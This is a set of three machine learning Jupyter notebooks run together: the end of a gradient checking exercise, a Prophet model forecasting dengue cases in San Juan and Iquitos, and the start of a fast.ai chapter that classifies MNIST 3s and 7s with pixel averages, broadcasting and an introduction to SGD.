gradients_to_vector(gradients) num_parameters = parameters_values.shape[0] J_plus = np.zeros((num_parameters, 1)) J_minus = np.zeros((num_parameters, 1)) gradapprox = np.zeros((num_parameters, 1)) # Compute gradapprox for i in range(num_parameters): # Compute J_plus[i]. Inputs: "parameters_values, epsilon". Output = "J_plus[i]". # "_" is used because the function you have to outputs two parameters but we only care about the first one ### START CODE HERE ### (approx. 3 lines) thetaplus = np.copy(parameters_values) # Step 1 thetaplus[i][0] = thetaplus[i][0] + epsilon # Step 2 J_plus[i], _ = forward_propagation_n(X, Y, vector_to_dictionary(thetaplus)) # Step 3 ### END CODE HERE ### # Compute J_minus[i]. Inputs: "parameters_values, epsilon". Output = "J_minus[i]". ### START CODE HERE ### (approx. 3 lines) thetaminus = np.copy(parameters_values) # Step 1 thetaminus[i][0] = thetaminus[i][0] - epsilon # Step 2 J_minus[i], _ = forward_propagation_n(X, Y, vector_to_dictionary(thetaminus)) # Step 3 ### END CODE HERE ### # Compute gradapprox[i] ### START CODE HERE ### (approx. 1 line) gradapprox[i] = (J_plus[i] - J_minus[i])/(2 * epsilon) ### END CODE HERE ### # Compare gradapprox to backward propagation gradients by computing difference. ### START CODE HERE ### (approx. 1 line) numerator = np.linalg.norm(grad - gradapprox) # Step 1' denominator = np.linalg.norm(grad) + np.linalg.norm(gradapprox) # Step 2' difference = numerator / denominator # Step 3' ### END CODE HERE ### if difference > 2e-7: print ("\033[93m" + "There is a mistake in the backward propagation! difference = " + str(difference) + "\033[0m") else: print ("\033[92m" + "Your backward propagation works perfectly fine! difference = " + str(difference) + "\033[0m") return difference X, Y, parameters = gradient_check_n_test_case() cost, cache = forward_propagation_n(X, Y, parameters) gradients = backward_propagation_n(X, Y, cache) difference = gradient_check_n(parameters, gradients, X, Y) ``` **Expected output**: <table> <tr> <td> ** There is a mistake in the backward propagation!** </td> <td> difference = 0.285093156781 </td> </tr> </table> It seems that there were errors in the `backward_propagation_n` code we gave you! Good that you've implemented the gradient check. Go back to `backward_propagation` and try to find/correct the errors *(Hint: check dW2 and db1)*. Rerun the gradient check when you think you've fixed it. Remember you'll need to re-execute the cell defining `backward_propagation_n()` if you modify the code. Can you get gradient check to declare your derivative computation correct? Even though this part of the assignment isn't graded, we strongly urge you to try to find the bug and re-run gradient check until you're convinced backprop is now correctly implemented. **Note** - Gradient Checking is slow! Approximating the gradient with $\frac{\partial J}{\partial \theta} \approx \frac{J(\theta + \varepsilon) - J(\theta - \varepsilon)}{2 \varepsilon}$ is computationally costly. For this reason, we don't run gradient checking at every iteration during training. Just a few times to check if the gradient is correct. - Gradient Checking, at least as we've presented it, doesn't work with dropout. You would usually run the gradient check algorithm without dropout to make sure your backprop is correct, then add dropout. Congrats, you can be confident that your deep learning model for fraud detection is working correctly! You can even use this to convince your CEO. :) <font color='blue'> **What you should remember from this notebook**: - Gradient checking __verifies closeness__ between the `gradients from backpropagation` and the `numerical approximation of the gradient` (computed using forward propagation). - __Gradient checking is slow__, so we don't run it in _every_ iteration of training. You would usually run it only to make sure your code is correct, then turn it off and use backprop for the actual learning process.
github_jupyter
``` import pandas as pd import numpy as np import seaborn as sns import matplotlib.pyplot as plt from os.path import join from sklearn.compose import ColumnTransformer from sklearn.impute import SimpleImputer from sklearn.metrics import mean_absolute_error from sklearn.pipeline import Pipeline from sklearn.preprocessing import StandardScaler from fbprophet import Prophet from fbprophet.diagnostics import cross_validation sns.set() ``` ## Pre-processing Same as before ``` def data_preprocessing(path): features = pd.read_csv(path) features = features.drop(['year', 'weekofyear'], axis = 1) features = features.drop(['reanalysis_sat_precip_amt_mm', 'reanalysis_tdtr_k'], axis = 1) features = features.rename({'week_start_date': 'ds'}, axis = 1) features_sj = features[features['city'] == 'sj'].drop('city', axis = 1) features_iq = features[features['city'] == 'iq'].drop('city', axis = 1) return (features_sj, features_iq) DATA_PATH = '../data/raw' train_sj_o, train_iq = data_preprocessing(join(DATA_PATH, 'dengue_features_train.csv')) test_sj, test_iq = data_preprocessing(join(DATA_PATH, 'dengue_features_test.csv')) train_labels = pd.read_csv(join(DATA_PATH, 'dengue_labels_train.csv')) train_sj_o.head() ``` ## Simple model ### San Juan ``` to_drop = list(train_sj_o.columns[1:]) train_sj = train_sj_o.drop(to_drop, axis = 1) train_sj['y'] = train_labels[train_labels['city'] == 'sj']['total_cases'] model_sj = Prophet( growth = 'linear', changepoint_prior_scale = 0.1, yearly_seasonality = 10, weekly_seasonality = False, daily_seasonality = False, seasonality_mode = 'multiplicative' ) model_sj.fit(train_sj) forecast_sj = model_sj.predict(train_sj) model_sj.plot(forecast_sj) ``` Cross validation ``` cv_sj = cross_validation(model_sj, horizon = '730 days') mean_absolute_error(cv_sj['yhat'], cv_sj['y']) ``` Performs slightly better than previous iteration of prophet ### Iquitos ``` to_drop = list(train_iq.columns[1:]) train_iq = train_iq.drop(to_drop, axis = 1) train_iq['y'] = train_labels[train_labels['city'] == 'iq']['total_cases'] model_iq = Prophet( growth = 'linear', yearly_seasonality = 5, weekly_seasonality = False, daily_seasonality = False, seasonality_mode = 'multiplicative' ) model_iq.fit(train_iq) forecast_iq = model_iq.predict(train_iq) model_iq.plot(forecast_iq) ``` Cross validation ``` cv_iq = cross_validation(model_iq, horizon = '730 days') mean_absolute_error(cv_iq['yhat'], cv_iq['y']) ``` Iquitos performs worse with multiplicative seasonality, so we remove it NOTE: Setting `seasonality_mode` to additive significantly improved the score. We're down to 26 MAE for San Jose, and ### Making predictions for Driven Data ``` prophet_basic_sub = pd.read_csv(join(DATA_PATH, 'submission_format.csv')) ``` San juan ``` to_drop = list(test_sj.columns[1:]) test_sj = test_sj.drop(to_drop, axis = 1) forecast_sj = model_sj.predict(test_sj)['yhat'].values ``` Iquitos ``` test_iq = test_iq.drop(to_drop, axis = 1) forecast_iq = model_iq.predict(test_iq)['yhat'].values y_pred = np.concatenate((forecast_sj, forecast_iq)) prophet_basic_sub['total_cases'] = np.round(y_pred).astype(int) prophet_basic_sub.to_csv('../models/prophet_basic_sub.csv', index = None) ``` ### Results 25.7 MAE on the leaderboard, a significant improvement over the previous
github_jupyter
``` #hide !pip install -Uqq fastbook import fastbook fastbook.setup_book() #hide from fastai.vision.all import * from fastbook import * matplotlib.rc('image', cmap='Greys') ``` # Under the Hood: Training a Digit Classifier Having seen what it looks like to actually train a variety of models in Chapter 2, let’s now look under the hood and see exactly what is going on. We’ll start by using computer vision to introduce fundamental tools and concepts for deep learning. To be exact, we'll discuss the roles of arrays and tensors and of broadcasting, a powerful technique for using them expressively. We'll explain stochastic gradient descent (SGD), the mechanism for learning by updating weights automatically. We'll discuss the choice of a loss function for our basic classification task, and the role of mini-batches. We'll also describe the math that a basic neural network is actually doing. Finally, we'll put all these pieces together. In future chapters we’ll do deep dives into other applications as well, and see how these concepts and tools generalize. But this chapter is about laying foundation stones. To be frank, that also makes this one of the hardest chapters, because of how these concepts all depend on each other. Like an arch, all the stones need to be in place for the structure to stay up. Also like an arch, once that happens, it's a powerful structure that can support other things. But it requires some patience to assemble. Let's begin. The first step is to consider how images are represented in a computer. ## Pixels: The Foundations of Computer Vision In order to understand what happens in a computer vision model, we first have to understand how computers handle images. We'll use one of the most famous datasets in computer vision, [MNIST](https://en.wikipedia.org/wiki/MNIST_database), for our experiments. MNIST contains images of handwritten digits, collected by the National Institute of Standards and Technology and collated into a machine learning dataset by Yann Lecun and his colleagues. Lecun used MNIST in 1998 in [Lenet-5](http://yann.lecun.com/exdb/lenet/), the first computer system to demonstrate practically useful recognition of handwritten digit sequences. This was one of the most important breakthroughs in the history of AI. ## Sidebar: Tenacity and Deep Learning The story of deep learning is one of tenacity and grit by a handful of dedicated researchers. After early hopes (and hype!) neural networks went out of favor in the 1990's and 2000's, and just a handful of researchers kept trying to make them work well. Three of them, Yann Lecun, Yoshua Bengio, and Geoffrey Hinton, were awarded the highest honor in computer science, the Turing Award (generally considered the "Nobel Prize of computer science"), in 2018 after triumphing despite the deep skepticism and disinterest of the wider machine learning and statistics community. Geoff Hinton has told of how even academic papers showing dramatically better results than anything previously published would be rejected by top journals and conferences, just because they used a neural network. Yann Lecun's work on convolutional neural networks, which we will study in the next section, showed that these models could read handwritten text—something that had never been achieved before. However, his breakthrough was ignored by most researchers, even as it was used commercially to read 10% of the checks in the US! In addition to these three Turing Award winners, there are many other researchers who have battled to get us to where we are today. For instance, Jurgen Schmidhuber (who many believe should have shared in the Turing Award) pioneered many important ideas, including working with his student Sepp Hochreiter on the long short-term memory (LSTM) architecture (widely used for speech recognition and other text modeling tasks, and used in the IMDb example in <<chapter_intro>>). Perhaps most important of all, Paul Werbos in 1974 invented back-propagation for neural networks, the technique shown in this chapter and used universally for training neural networks ([Werbos 1994](https://books.google.com/books/about/The_Roots_of_Backpropagation.html?id=WdR3OOM2gBwC)). His development was almost entirely ignored for decades, but today it is considered the most important foundation of modern AI. There is a lesson here for all of us! On your deep learning journey you will face many obstacles, both technical, and (even more difficult) posed by people around you who don't believe you'll be successful. There's one *guaranteed* way to fail, and that's to stop trying. We've seen that the only consistent trait amongst every fast.ai student that's gone on to be a world-class practitioner is that they are all very tenacious. ## End sidebar For this initial tutorial we are just going to try to create a model that can classify any image as a 3 or a 7. So let's download a sample of MNIST that contains images of just these digits: ``` path = untar_data(URLs.MNIST_SAMPLE) #hide Path.BASE_PATH = path ``` We can see what's in this directory by using `ls`, a method added by fastai. This method returns an object of a special fastai class called `L`, which has all the same functionality of Python's built-in `list`, plus a lot more. One of its handy features is that, when printed, it displays the count of items, before listing the items themselves (if there are more than 10 items, it just shows the first few): ``` path.ls() ``` The MNIST dataset follows a common layout for machine learning datasets: separate folders for the training set and the validation set (and/or test set). Let's see what's inside the training set: ``` (path/'train').ls() ``` There's a folder of 3s, and a folder of 7s. In machine learning parlance, we say that "3" and "7" are the *labels* (or targets) in this dataset. Let's take a look in one of these folders (using `sorted` to ensure we all get the same order of files): ``` threes = (path/'train'/'3').ls().sorted() sevens = (path/'train'/'7').ls().sorted() threes ``` As we might expect, it's full of image files. Let’s take a look at one now. Here’s an image of a handwritten number 3, taken from the famous MNIST dataset of handwritten numbers: ``` im3_path = threes[1] im3 = Image.open(im3_path) im3 ``` Here we are using the `Image` class from the *Python Imaging Library* (PIL), which is the most widely used Python package for opening, manipulating, and viewing images. Jupyter knows about PIL images, so it displays the image for us automatically. In a computer, everything is represented as a number. To view the numbers that make up this image, we have to convert it to a *NumPy array* or a *PyTorch tensor*. For instance, here's what a section of the image looks like, converted to a NumPy array: ``` array(im3)[4:10,4:10] ``` The `4:10` indicates we requested the rows from index 4 (included) to 10 (not included) and the same for the columns. NumPy indexes from top to bottom and left to right, so this section is located in the top-left corner of the image. Here's the same thing as a PyTorch tensor: ``` tensor(im3)[4:10,4:10] ``` We can slice the array to pick just the part with the top of the digit in it, and then use a Pandas DataFrame to color-code the values using a gradient, which shows us clearly how the image is created from the pixel values: ``` #hide_output im3_t = tensor(im3) df = pd.DataFrame(im3_t[4:15,4:22]) df.style.set_properties(**{'font-size':'6pt'}).background_gradient('Greys') ``` <img width="453" id="output_pd_pixels" src="images/att_00058.png"> You can see that the background white pixels are stored as the number 0, black is the number 255, and shades of gray are between the two. The entire image contains 28 pixels across and 28 pixels down, for a total of 784 pixels. (This is much smaller than an image that you would get from a phone camera, which has millions of pixels, but is a convenient size for our initial learning and experiments. We will build up to bigger, full-color images soon.) So, now you've seen what an image looks like to a computer, let's recall our goal: create a model that can recognize 3s and 7s. How might you go about getting a computer to do that? > Warning: Stop and Think!: Before you read on, take a moment to think about how a computer might be able to recognize these two different digits. What kinds of features might it be able to look at? How might it be able to identify these features? How could it combine them together? Learning works best when you try to solve problems yourself, rather than just reading somebody else's answers; so step away from this book for a few minutes, grab a piece of paper and pen, and jot some ideas down… ## First Try: Pixel Similarity So, here is a first idea: how about we find the average pixel value for every pixel of the 3s, then do the same for the 7s. This will give us two group averages, defining what we might call the "ideal" 3 and 7. Then, to classify an image as one digit or the other, we see which of these two ideal digits the image is most similar to. This certainly seems like it should be better than nothing, so it will make a good baseline. > jargon: Baseline: A simple model which you are confident should perform reasonably well. It should be very simple to implement, and very easy to test, so that you can then test each of your improved ideas, and make sure they are always better than your baseline. Without starting with a sensible baseline, it is very difficult to know whether your super-fancy models are actually any good. One good approach to creating a baseline is doing what we have done here: think of a simple, easy-to-implement model. Another good approach is to search around to find other people that have solved similar problems to yours, and download and run their code on your dataset. Ideally, try both of these! Step one for our simple model is to get the average of pixel values for each of our two groups. In the process of doing this, we will learn a lot of neat Python numeric programming tricks! Let's create a tensor containing all of our 3s stacked together. We already know how to create a tensor containing a single image. To create a tensor containing all the images in a directory, we will first use a Python list comprehension to create a plain list of the single image tensors. We will use Jupyter to do some little checks of our work along the way—in this case, making sure that the number of returned items seems reasonable: ``` seven_tensors = [tensor(Image.open(o)) for o in sevens] three_tensors = [tensor(Image.open(o)) for o in threes] len(three_tensors),len(seven_tensors) ``` > note: List Comprehensions: List and dictionary comprehensions are a wonderful feature of Python. Many Python programmers use them every day, including the authors of this book—they are part of "idiomatic Python." But programmers coming from other languages may have never seen them before. There are a lot of great tutorials just a web search away, so we won't spend a long time discussing them now. Here is a quick explanation and example to get you started. A list comprehension looks like this: `new_list = [f(o) for o in a_list if o>0]`. This will return every element of `a_list` that is greater than 0, after passing it to the function `f`. There are three parts here: the collection you are iterating over (`a_list`), an optional filter (`if o>0`), and something to do to each element (`f(o)`). It's not only shorter to write but way faster than the alternative ways of creating the same list with a loop. We'll also check that one of the images looks okay. Since we now have tensors (which Jupyter by default will print as values), rather than PIL images (which Jupyter by default will display as images), we need to use fastai's `show_image` function to display it: ``` show_image(three_tensors[1]); ``` For every pixel position, we want to compute the average over all the images of the intensity of that pixel. To do this we first combine all the images in this list into a single three-dimensional tensor. The most common way to describe such a tensor is to call it a *rank-3 tensor*. We often need to stack up individual tensors in a collection into a single tensor. Unsurprisingly, PyTorch comes with a function called `stack` that we can use for this purpose. Some operations in PyTorch, such as taking a mean, require us to *cast* our integer types to float types. Since we'll be needing this later, we'll also cast our stacked tensor to `float` now. Casting in PyTorch is as simple as typing the name of the type you wish to cast to, and treating it as a method. Generally when images are floats, the pixel values are expected to be between 0 and 1, so we will also divide by 255 here: ``` stacked_sevens = torch.stack(seven_tensors).float()/255 stacked_threes = torch.stack(three_tensors).float()/255 stacked_threes.shape ``` Perhaps the most important attribute of a tensor is its *shape*. This tells you the length of each axis. In this case, we can see that we have 6,131 images, each of size 28×28 pixels. There is nothing specifically about this tensor that says that the first axis is the number of images, the second is the height, and the third is the width—the semantics of a tensor are entirely up to us, and how we construct it. As far as PyTorch is concerned, it is just a bunch of numbers in memory. The *length* of a tensor's shape is its rank: ``` len(stacked_threes.shape) ``` It is really important for you to commit to memory and practice these bits of tensor jargon: _rank_ is the number of axes or dimensions in a tensor; _shape_ is the size of each axis of a tensor. > A: Watch out because the term "dimension" is sometimes used in two ways. Consider that we live in "three-dimensonal space" where a physical position can be described by a 3-vector `v`. But according to PyTorch, the attribute `v.ndim` (which sure looks like the "number of dimensions" of `v`) equals one, not three! Why? Because `v` is a vector, which is a tensor of rank one, meaning that it has only one _axis_ (even if that axis has a length of three). In other words, sometimes dimension is used for the size of an axis ("space is three-dimensional"); other times, it is used for the rank, or the number of axes ("a matrix has two dimensions"). When confused, I find it helpful to translate all statements into terms of rank, axis, and length, which are unambiguous terms. We can also get a tensor's rank directly with `ndim`: ``` stacked_threes.ndim ``` Finally, we can compute what the ideal 3 looks like. We calculate the mean of all the image tensors by taking the mean along dimension 0 of our stacked, rank-3 tensor. This is the dimension that indexes over all the images. In other words, for every pixel position, this will compute the average of that pixel over all images. The result will be one value for every pixel position, or a single image. Here it is: ``` mean3 = stacked_threes.mean(0) show_image(mean3); ``` According to this dataset, this is the ideal number 3! (You may not like it, but this is what peak number 3 performance looks like.) You can see how it's very dark where all the images agree it should be dark, but it becomes wispy and blurry where the images disagree. Let's do the same thing for the 7s, but put all the steps together at once to save some time: ``` mean7 = stacked_sevens.mean(0) show_image(mean7); ``` Let's now pick an arbitrary 3 and measure its *distance* from our "ideal digits." > stop: Stop and Think!: How would you calculate how similar a particular image is to each of our ideal digits? Remember to step away from this book and jot down some ideas before you move on! Research shows that recall and understanding improves dramatically when you are engaged with the learning process by solving problems, experimenting, and trying new ideas yourself Here's a sample 3: ``` a_3 = stacked_threes[1] show_image(a_3); ``` How can we determine its distance from our ideal 3? We can't just add up the differences between the pixels of this image and the ideal digit. Some differences will be positive while others will be negative, and these differences will cancel out, resulting in a situation where an image that is too dark in some places and too light in others might be shown as having zero total differences from the ideal. That would be misleading! To avoid this, there are two main ways data scientists measure distance in this context: - Take the mean of the *absolute value* of differences (absolute value is the function that replaces negative values with positive values). This is called the *mean absolute difference* or *L1 norm* - Take the mean of the *square* of differences (which makes everything positive) and then take the *square root* (which undoes the squaring). This is called the *root mean squared error* (RMSE) or *L2 norm*. > important: It's Okay to Have Forgotten Your Math: In this book we generally assume that you have completed high school math, and remember at least some of it... But everybody forgets some things! It all depends on what you happen to have had reason to practice in the meantime. Perhaps you have forgotten what a _square root_ is, or exactly how they work. No problem! Any time you come across a maths concept that is not explained fully in this book, don't just keep moving on; instead, stop and look it up. Make sure you understand the basic idea, how it works, and why we might be using it. One of the best places to refresh your understanding is Khan Academy. For instance, Khan Academy has a great [introduction to square roots](https://www.khanacademy.org/math/algebra/x2f8bb11595b61c86:rational-exponents-radicals/x2f8bb11595b61c86:radicals/v/understanding-square-roots). Let's try both of these now: ``` dist_3_abs = (a_3 - mean3).abs().mean() dist_3_sqr = ((a_3 - mean3)**2).mean().sqrt() dist_3_abs,dist_3_sqr dist_7_abs = (a_3 - mean7).abs().mean() dist_7_sqr = ((a_3 - mean7)**2).mean().sqrt() dist_7_abs,dist_7_sqr ``` In both cases, the distance between our 3 and the "ideal" 3 is less than the distance to the ideal 7. So our simple model will give the right prediction in this case. PyTorch already provides both of these as *loss functions*. You'll find these inside `torch.nn.functional`, which the PyTorch team recommends importing as `F` (and is available by default under that name in fastai): ``` F.l1_loss(a_3.float(),mean7), F.mse_loss(a_3,mean7).sqrt() ``` Here `mse` stands for *mean squared error*, and `l1` refers to the standard mathematical jargon for *mean absolute value* (in math it's called the *L1 norm*). > S: Intuitively, the difference between L1 norm and mean squared error (MSE) is that the latter will penalize bigger mistakes more heavily than the former (and be more lenient with small mistakes). > J: When I first came across this "L1" thingie, I looked it up to see what on earth it meant. I found on Google that it is a _vector norm_ using _absolute value_, so looked up _vector norm_ and started reading: _Given a vector space V over a field F of the real or complex numbers, a norm on V is a nonnegative-valued any function p: V → \[0,+∞) with the following properties: For all a ∈ F and all u, v ∈ V, p(u + v) ≤ p(u) + p(v)..._ Then I stopped reading. "Ugh, I'll never understand math!" I thought, for the thousandth time. Since then I've learned that every time these complex mathy bits of jargon come up in practice, it turns out I can replace them with a tiny bit of code! Like, the _L1 loss_ is just equal to `(a-b).abs().mean()`, where `a` and `b` are tensors. I guess mathy folks just think differently than me... I'll make sure in this book that every time some mathy jargon comes up, I'll give you the little bit of code it's equal to as well, and explain in common-sense terms what's going on. We just completed various mathematical operations on PyTorch tensors. If you've done some numeric programming in PyTorch before, you may recognize these as being similar to NumPy arrays. Let's have a look at those two very important data structures. ### NumPy Arrays and PyTorch Tensors [NumPy](https://numpy.org/) is the most widely used library for scientific and numeric programming in Python. It provides very similar functionality and a very similar API to that provided by PyTorch; however, it does not support using the GPU or calculating gradients, which are both critical for deep learning. Therefore, in this book we will generally use PyTorch tensors instead of NumPy arrays, where possible. (Note that fastai adds some features to NumPy and PyTorch to make them a bit more similar to each other. If any code in this book doesn't work on your computer, it's possible that you forgot to include a line like this at the start of your notebook: `from fastai.vision.all import *`.) But what are arrays and tensors, and why should you care? Python is slow compared to many languages. Anything fast in Python, NumPy, or PyTorch is likely to be a wrapper for a compiled object written (and optimized) in another language—specifically C. In fact, **NumPy arrays and PyTorch tensors can finish computations many thousands of times faster than using pure Python.** A NumPy array is a multidimensional table of data, with all items of the same type. Since that can be any type at all, they can even be arrays of arrays, with the innermost arrays potentially being different sizes—this is called a "jagged array." By "multidimensional table" we mean, for instance, a list (dimension of one), a table or matrix (dimension of two), a "table of tables" or "cube" (dimension of three), and so forth. If the items are all of some simple type such as integer or float, then NumPy will store them as a compact C data structure in memory. This is where NumPy shines. NumPy has a wide variety of operators and methods that can run computations on these compact structures at the same speed as optimized C, because they are written in optimized C. A PyTorch tensor is nearly the same thing as a NumPy array, but with an additional restriction that unlocks some additional capabilities. It's the same in that it, too, is a multidimensional table of data, with all items of the same type. However, the restriction is that a tensor cannot use just any old type—it has to use a single basic numeric type for all components. For example, a PyTorch tensor cannot be jagged. It is always a regularly shaped multidimensional rectangular structure. The vast majority of methods and operators supported by NumPy on these structures are also supported by PyTorch, but PyTorch tensors have additional capabilities. One major capability is that these structures can live on the GPU, in which case their computation will be optimized for the GPU and can run much faster (given lots of values to work on). In addition, PyTorch can automatically calculate derivatives of these operations, including combinations of operations. As you'll see, it would be impossible to do deep learning in practice without this capability. > S: If you don't know what C is, don't worry as you won't need it at all. In a nutshell, it's a low-level (low-level means more similar to the language that computers use internally) language that is very fast compared to Python. To take advantage of its speed while programming in Python, try to avoid as much as possible writing loops, and replace them by commands that work directly on arrays or tensors. Perhaps the most important new coding skill for a Python programmer to learn is how to effectively use the array/tensor APIs. We will be showing lots more tricks later in this book, but here's a summary of the key things you need to know for now. To create an array or tensor, pass a list (or list of lists, or list of lists of lists, etc.) to `array()` or `tensor()`: ``` data = [[1,2,3],[4,5,6]] arr = array (data) tns = tensor(data) arr # numpy tns # pytorch ``` All the operations that follow are shown on tensors, but the syntax and results for NumPy arrays is identical. You can select a row (note that, like lists in Python, tensors are 0-indexed so 1 refers to the second row/column): ``` tns[1] ``` or a column, by using `:` to indicate *all of the first axis* (we sometimes refer to the dimensions of tensors/arrays as *axes*): ``` tns[:,1] ``` You can combine these with Python slice syntax (`[start:end]` with `end` being excluded) to select part of a row or column: ``` tns[1,1:3] ``` And you can use the standard operators such as `+`, `-`, `*`, `/`: ``` tns+1 ``` Tensors have a type: ``` tns.type() ``` And will automatically change type as needed, for example from `int` to `float`: ``` tns*1.5 ``` So, is our baseline model any good? To quantify this, we must define a metric. ## Computing Metrics Using Broadcasting Recall that a metric is a number that is calculated based on the predictions of our model, and the correct labels in our dataset, in order to tell us how good our model is. For instance, we could use either of the functions we saw in the previous section, mean squared error, or mean absolute error, and take the average of them over the whole dataset. However, neither of these are numbers that are very understandable to most people; in practice, we normally use *accuracy* as the metric for classification models. As we've discussed, we want to calculate our metric over a *validation set*. This is so that we don't inadvertently overfit—that is, train a model to work well only on our training data. This is not really a risk with the pixel similarity model we're using here as a first try, since it has no trained components, but we'll use a validation set anyway to follow normal practices and to be ready for our second try later. To get a validation set we need to remove some of the data from training entirely, so it is not seen by the model at all. As it turns out, the creators of the MNIST dataset have already done this for us. Do you remember how there was a whole separate directory called *valid*? That's what this directory is for! So to start with, let's create tensors for our 3s and 7s from that directory. These are the tensors we will use to calculate a metric measuring the quality of our first-try model, which measures distance from an ideal image: ``` valid_3_tens = torch.stack([tensor(Image.open(o)) for o in (path/'valid'/'3').ls()]) valid_3_tens = valid_3_tens.float()/255 valid_7_tens = torch.stack([tensor(Image.open(o)) for o in (path/'valid'/'7').ls()]) valid_7_tens = valid_7_tens.float()/255 valid_3_tens.shape,valid_7_tens.shape ``` It's good to get in the habit of checking shapes as you go. Here we see two tensors, one representing the 3s validation set of 1,010 images of size 28×28, and one representing the 7s validation set of 1,028 images of size 28×28. We ultimately want to write a function, `is_3`, that will decide if an arbitrary image is a 3 or a 7. It will do this by deciding which of our two "ideal digits" this arbitrary image is closer to. For that we need to define a notion of distance—that is, a function that calculates the distance between two images. We can write a simple function that calculates the mean absolute error using an experssion very similar to the one we wrote in the last section: ``` def mnist_distance(a,b): return (a-b).abs().mean((-1,-2)) mnist_distance(a_3, mean3) ``` This is the same value we previously calculated for the distance between these two images, the ideal 3 `mean_3` and the arbitrary sample 3 `a_3`, which are both single-image tensors with a shape of `[28,28]`. But in order to calculate a metric for overall accuracy, we will need to calculate the distance to the ideal 3 for _every_ image in the validation set. How do we do that calculation? We could write a loop over all of the single-image tensors that are stacked within our validation set tensor, `valid_3_tens`, which has a shape of `[1010,28,28]` representing 1,010 images. But there is a better way. Something very interesting happens when we take this exact same distance function, designed for comparing two single images, but pass in as an argument `valid_3_tens`, the tensor that represents the 3s validation set: ``` valid_3_dist = mnist_distance(valid_3_tens, mean3) valid_3_dist, valid_3_dist.shape ``` Instead of complaining about shapes not matching, it returned the distance for every single image as a vector (i.e., a rank-1 tensor) of length 1,010 (the number of 3s in our validation set). How did that happen? Take another look at our function `mnist_distance`, and you'll see we have there the subtraction `(a-b)`. The magic trick is that PyTorch, when it tries to perform a simple subtraction operation between two tensors of different ranks, will use *broadcasting*. That is, it will automatically expand the tensor with the smaller rank to have the same size as the one with the larger rank. Broadcasting is an important capability that makes tensor code much easier to write. After broadcasting so the two argument tensors have the same rank, PyTorch applies its usual logic for two tensors of the same rank: it performs the operation on each corresponding element of the two tensors, and returns the tensor result. For instance: ``` tensor([1,2,3]) + tensor([1,1,1]) ``` So in this case, PyTorch treats `mean3`, a rank-2 tensor representing a single image, as if it were 1,010 copies of the same image, and then subtracts each of those copies from each 3 in our validation set. What shape would you expect this tensor to have? Try to figure it out yourself before you look at the answer below: ``` (valid_3_tens-mean3).shape ``` We are calculating the difference between our "ideal 3" and each of the 1,010 3s in the validation set, for each of 28×28 images, resulting in the shape `[1010,28,28]`. There are a couple of important points about how broadcasting is implemented, which make it valuable not just for expressivity but also for performance: - PyTorch doesn't *actually* copy `mean3` 1,010 times. It *pretends* it were a tensor of that shape, but doesn't actually allocate any additional memory - It does the whole calculation in C (or, if you're using a GPU, in CUDA, the equivalent of C on the GPU), tens of thousands of times faster than pure Python (up to millions of times faster on a GPU!). This is true of all broadcasting and elementwise operations and functions done in PyTorch. *It's the most important technique for you to know to create efficient PyTorch code.* Next in `mnist_distance` we see `abs`. You might be able to guess now what this does when applied to a tensor. It applies the method to each individual element in the tensor, and returns a tensor of the results (that is, it applies the method "elementwise"). So in this case, we'll get back 1,010 matrices of absolute values. Finally, our function calls `mean((-1,-2))`. The tuple `(-1,-2)` represents a range of axes. In Python, `-1` refers to the last element, and `-2` refers to the second-to-last. So in this case, this tells PyTorch that we want to take the mean ranging over the values indexed by the last two axes of the tensor. The last two axes are the horizontal and vertical dimensions of an image. After taking the mean over the last two axes, we are left with just the first tensor axis, which indexes over our images, which is why our final size was `(1010)`. In other words, for every image, we averaged the intensity of all the pixels in that image. We'll be learning lots more about broadcasting throughout this book, especially in <<chapter_foundations>>, and will be practicing it regularly too. We can use `mnist_distance` to figure out whether an image is a 3 or not by using the following logic: if the distance between the digit in question and the ideal 3 is less than the distance to the ideal 7, then it's a 3. This function will automatically do broadcasting and be applied elementwise, just like all PyTorch functions and operators: ``` def is_3(x): return mnist_distance(x,mean3) < mnist_distance(x,mean7) ``` Let's test it on our example case: ``` is_3(a_3), is_3(a_3).float() ``` Note that when we convert the Boolean response to a float, we get `1.0` for `True` and `0.0` for `False`. Thanks to broadcasting, we can also test it on the full validation set of 3s: ``` is_3(valid_3_tens) ``` Now we can calculate the accuracy for each of the 3s and 7s by taking the average of that function for all 3s and its inverse for all 7s: ``` accuracy_3s = is_3(valid_3_tens).float() .mean() accuracy_7s = (1 - is_3(valid_7_tens).float()).mean() accuracy_3s,accuracy_7s,(accuracy_3s+accuracy_7s)/2 ``` This looks like a pretty good start! We're getting over 90% accuracy on both 3s and 7s, and we've seen how to define a metric conveniently using broadcasting. But let's be honest: 3s and 7s are very different-looking digits. And we're only classifying 2 out of the 10 possible digits so far. So we're going to need to do better! To do better, perhaps it is time to try a system that does some real learning—that is, that can automatically modify itself to improve its performance. In other words, it's time to talk about the training process, and SGD. ## Stochastic Gradient Descent (SGD) Do you remember the way that Arthur Samuel described machine learning, which we quoted in <<chapter_intro>>? > : Suppose we arrange for some automatic means of testing the effectiveness of any current weight assignment in terms of actual performance and provide a mechanism for altering the weight assignment so as to maximize the performance. We need not go into the details of such a procedure to see that it could be made entirely automatic and to see that a machine so programmed would "learn" from its experience. As we discussed, this is the key to allowing us to have a model that can get better and better—that can learn. But our pixel similarity approach does not really do this. We do not have any kind of weight assignment, or any way of improving based on testing the effectiveness of a weight assignment. In other words, we can't really improve our pixel similarity approach by modifying a set of parameters. In order to take advantage of the power of deep learning, we will first have to represent our task in the way that Arthur Samuel described it. Instead of trying to find the similarity between an image and an "ideal image," we could instead look at each individual pixel and come up with a set of weights for each one, such that the highest weights are associated with those pixels most likely to be black for a particular category. For instance, pixels toward the bottom right are not very likely to be activated for a 7, so they should have a low weight for a 7, but they are likely to be activated for an 8, so they should have a high weight for an 8. This can be represented as a function and set of weight values for each possible category—for instance the probability of being the number 8: ``` def pr_eight(x,w) = (x*w).sum() ``` Here we are assuming that `x` is the image, represented as a vector—in other words, with all of the rows stacked up end to end into a single long line. And we are assuming that the weights are a vector `w`. If we have this function, then we just need some way to update the weights to make them a little bit better. With such an approach, we can repeat that step a number of times, making the weights better and better, until they are as good as we can make them. We want to find the specific values for the vector `w` that causes the result of our function to be high for those images that are actually 8s, and low for those images that are not. Searching for the best vector `w` is a way to search for the best function for recognising 8s. (Because we are not yet using a deep neural network, we are limited by what our function can actually do—we are going to fix that constraint later in this chapter.) To be more specific, here are the steps that we are going to require, to turn this function into a machine learning classifier: 1. *Initialize* the weights. 1. For each image, use these weights to *predict* whether it appears to be a 3 or a 7. 1. Based on these predictions, calculate how good the model is (its *loss*). 1. Calculate the *gradient*, which measures for each weight, how changing that weight would change the loss 1. *Step* (that is, change) all the 